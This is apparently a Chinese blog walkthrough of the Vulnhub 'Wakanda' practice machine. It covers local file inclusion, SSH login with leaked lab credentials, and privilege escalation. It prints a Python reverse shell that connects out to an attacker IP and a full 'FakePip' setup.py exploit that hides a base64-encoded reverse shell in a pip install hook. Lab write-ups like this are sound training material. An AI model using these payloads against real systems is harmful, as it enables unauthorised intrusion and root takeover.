Vulnhub入门实战-Wakanda

最新推荐文章于 2024-08-04 15:33:18 发布
最新推荐文章于 2024-08-04 15:33:18 发布
阅读量2.2k 收藏 13
点赞数 2
分类专栏: vulnhub靶场
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_24033605/article/details/118723888
版权

下载链接

描述:
在这里插入图片描述
1.探测主机的IP地址
在这里插入图片描述
2.使用nmap查看靶机开放端口。
在这里插入图片描述
开放了4个端口,老样子先从http下手。
在这里插入图片描述
3.进去发现没什么可以点的,于是进行目录扫描。
在这里插入图片描述
状态码都是200,但是size为0,所以返回的都是空页面。

查看主页源代码,发现一个注释。
在这里插入图片描述
猜测存在本地文件包含漏洞,抓包看一下。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
成功读取主页源码,并发现密码,猜测下一步根据账号和密码进行ssh登录。
账户猜测就是主页的namemamadou,passwdNiamey4Ever227!!!
在这里插入图片描述
这里的使用凭证是有效的,但是还未得到shell,只是进入python shell,通过python命令获取shell。

import pty
pty.spawn("/bin/sh")

在这里插入图片描述
成功获取shell,并拿到第一个flag。
查看/etc/passwd文件。
在这里插入图片描述
用户devops具有bash的访问权限,查看该用户的所有文件。
在这里插入图片描述
找到了flag2的文件位置,但是权限不够,(偷偷看了别人的wp,发现还有文件没有找到)
find / -user devops 2>/dev/null -ls
该命令将权限属于devops的文件全部找到,并无错误的显示出来。
在这里插入图片描述
这里的python文件引起了注意,查看一下内容。
在这里插入图片描述
打开tmp目录下的test文件,并写入test。查看一下test文件的权限。
在这里插入图片描述
test文件的权限是devops,所以它运行时将拥有devops的用户权限。如果我们能够编写一个python反向连接程序并将其替换为".antivirus.py",那么我们将获取devops的权限。
python反向连接程序:

import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("192.168.0.186",1234))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/bash","-i"])

将该文件放在kali的/var/www/html上,开启apache服务,让靶机去下载。
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

(该脚本会自动执行,只需等待几分钟就会连接)
在这里插入图片描述
查看用户sudo权限。只有pip可以用。
在这里插入图片描述
网上找一个exp。
exp链接

from setuptools import setup
from setuptools.command.install import install
import base64
import os
 
 
class CustomInstall(install):
  def run(self):
    install.run(self)
    RHOST = '192.168.199.112' 
 
    reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 7777; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST
    encoded = base64.b64encode(reverse_shell)
    os.system('echo %s|base64 -d|bash' % encoded)
 
 
setup(name='FakePip',
      version='0.0.1',
      description='This will exploit a sudoer able to /usr/bin/pip install *',
      url='https://github.com/0x00-0x00/fakepip',
      author='zc00l',
      author_email='andre.marques@esecurity.com.br',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})

同样的wget方法,将文件上传至靶机,之后转移至tmp目录,在devops的用户下使用该命令:

sudo pip install . --upgrade --force-reinstall

在这里插入图片描述
在这里插入图片描述
成功得到三个flag。

TzZzEZ-web
关注
专栏目录
VibHub-Server:VibHub振动器系统的自托管服务器
05-08
VibHub服务器 VibHub振动器系统的自托管服务器。 想要创建自己的USB玩具吗? 使用 如果要使用JasX托管中继,则不需要此软件。 安装: Git将项目克隆到所需的任何文件夹中。 npm init npm install 如果需要,请编辑config.json文件 node index 更多文档将在以后发布。
看完这篇 教你玩转渗透测试靶机vulnhub——EvilBox-One
Aluxian_的博客
07-15 5700
Vulnhub靶机Web1渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 老样子需要找到flag即可。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/evilbox/EvilBox—One.ova
Vulnhub入门篇-Kioptrix2014
最新发布
2302_78903258的博客
08-04 1108
信息收集还是非常重要的,以及对网站的信息搜索,网站使用的中间件、系统之间的漏洞都可以拿来利用,但是我上面有不足之处,并没有获得webshell,提权就是根据FreeBSD的漏洞进行利用的。
【甄选靶场】Vulnhub百个项目渗透——项目一:GoldenEye(密码爆破,图片逆向分析,内核提权)
xnxqwzy的博客
07-29 3356
本文章仅用作实验学习,实验环境均为自行搭建的公开vuinhub靶场,仅使用kali虚拟机作为操作学习工具。本文仅用作学习记录,不做任何导向。请勿在现实环境中模仿,操作。1.密码爆破(九头蛇)2.图片逆向分析(binwalk(路由逆向分析工具)exiftool(图虫)strings(识别动态库版本指令))3.内核提权(没有gcc的环境的替代方法)
Vulnhub】搭建Vulnhub靶机
qq_53058639的博客
01-23 3215
Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。
VulnHub渗透实战Billu_b0x
Fly_鹏程万里
06-06 7784
简介VulnHub是一个面向所有人开放的安全靶场,里面有很多安全环境,只要下载相关镜像,在相关虚拟机上面运行就可以练习相关靶场了。里面设计了好多关,如果有耐心一定可以到达峰顶。许多考oscp人员,也会利用vulnhub靶场进行刷题。我们下载了一个经典漏洞靶场,给大家进行演示,希望让初学者知道渗透测试的套路,可以更快的成长。官网:https://www.vulnhub.com/参考了一些国外设计靶场...
angular-wakanda-upload
05-22
以上就是"angular-wakanda-upload"示例的基本工作原理。通过结合AngularJS的强大功能和Wakanda的全栈JavaScript环境,我们可以构建出高效、健壮的文件上传系统。对于开发者来说,这种组合提供了一种无缝的开发体验,...
ionic-starter-wakanda:Ionic Wakanda 的空白启动项目
07-17
它缺少 Ionic 库和 Angular-Wakanda。 要使用它,请使用 ionic node.js 实用程序创建一个新的 ionic 项目,或者将其复制并粘贴到现有的 Cordova 项目中,然后单独下载 Ionic 的发行版。 先决条件 当然你需要节点,...
core-Wakanda:核心-瓦坎达
07-12
Wakanda 由几个部分组成,每个部分都有自己的存储库。实现 Wakanda Server 的应用程序逻辑。 跨平台 C++ 框架,可简化在 Windows、OSX、Linux 上移植 wakanda 服务器。 它还提供有关图形、网络、xml、javascript 的...
todo-wakanda:用wakanda创建的一个简单的待办事项应用
04-28
wakanda创建的一个简单的待办事项应用 可以从以下获得演示: : 本地运行 确保已安装 ,然后运行以下命令: $ git clone https://github.com/midrissi/todo-wakanda.git $ cd todo-wakanda $ npm i 然后用...
generator-wakanda-project:约曼瓦坎达项目生成器
07-08
这个非官方的Yeoman 生成器创建了 Wakanda 项目和解决方案,然后您可以从任何开发工具进行编辑,并提供 Grunt 服务任务以在 Wakanda 服务器上启动它们。 如何安装 安装 npm 并非每台新计算机都预装了 Yeoman。 他...
VulnHub渗透测试实战靶场笔记(持续更新)
晚风不及你
03-05 7846
Breach1.0 下载链接 https://download.vulnhub.com/breach/Breach-1.0.zip 靶机说明 Breach1.0是一个难度为初级到中级的BooT2Root/CTF挑战。 VM虚机配置有静态IP地址(192.168.110.140),需要将虚拟机网卡设置为host-only方式组网。非常感谢Knightmare和rastamouse进行测试和提供反馈。...
看完这篇 教你玩转渗透测试靶机vulnhub——DC7
Aluxian_的博客
04-01 6124
Vulnhub靶机DC6渗透测试详解Vulnhub靶机介绍:Vulnhub靶机下载:Vulnhub靶机安装:Vulnhub靶机漏洞详解:①:信息收集: Vulnhub靶机介绍: vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 靶机DC7 还是老样子只有拿到root权限才可以发现最终的flag。 Vulnhub靶机下载: 官网地址:https://download.vulnhub.com/dc/D
教你怎么用Vulnhub来搭建环境
热门推荐
大方子
09-22 2万+
0x01 前言 Vulnhub它是一个提供各种漏洞环境的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 如果只是练习一些常见的漏洞可以看我另外两篇用Docker来搭建各种漏洞靶场(妈妈再也不用担心我没有靶场练习了)从CentOS安装Docker来搭建漏洞靶场到Joomla 3.4.5 反序列化漏洞复现(附批量Getshell脚本) 0x02 下载 https:/...
【内网渗透】vulnhub三个基础靶场wp
weixin_51614272的博客
09-15 3629
ssh、msf、webdav、linux、kali、basic_pentesting_1、Me-and-My-Girlfriend-1、narak
vulnhub靶场实战系列(一)之vulnhub靶场介绍
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
03-07 3055
我们在学习了各种web漏洞的原理和各种内网的攻击手法的利用之后,需要实战来提升经验,这一环节就可以有操作系统靶场平台来代替一方面因为靶场是现成的,已经搭建好的靶场,只需要下载到本地用虚拟机安装就可以了,非常省时。第二点,非常安全,我们要知道没有经过法律允许的渗透行为是犯法的,而我们使用靶场来模拟达到实战训练的目的的同时也不会触碰法律。名称描述网站vulnhub与Kali同一家公司(offsec)出品。一共有600多个镜像,可以在VMWare或者VirtualBox打开,有不同难度。
看完这篇 教你玩转渗透测试靶机vulnhub——FunBox1
Aluxian_的博客
09-05 2470
vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。老样子需要找到flag即可。1.修改/etc/hosts文件 解析网站2.从新学习了一遍定时提权 (主要是回弹的命令)3.还有一些简单的扫码工具 和枚举工具 这靶机其实很简单 因为太久没做了 所以从新温习一下 主要是学习渗透的思路!
[渗透测试实战]vulnhub靶场1 初步掌握渗透流程(详细步骤)
知识库总结、分享
07-01 1926
Fuzzing可以帮助发现那些常规的安全测试无法发现的漏洞和弱点,因为它可以测试系统的响应能力,以及处理异常数据的能力。目前已知系统提供的服务ssh和http,web用的是WordPress cms系统,渗透系统希望获得用户和密码,访问WordPress看能不能得到账户信息。拿到正确参数,需要传入参数访问url拿到系统信息,参数file是文件的意思,第一想到的是拿到系统的账户文件/etc/passwd,继续传参数访问。不报gcc相关的错误了,也算解决了一个问题,又出现了程序执行权限问题,真是大肠包小肠!
JavaScript技巧集锦:提升效率与安全的45个实战技巧
JavaScript作为全球最流行的编程语言,广泛应用于网页、移动混合应用(如PhoneGap或Appcelerator)、服务器端(如NodeJS或Wakanda)以及众多其他实现。对于许多初入编程世界的开发者来说,JavaScript是一个很好的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值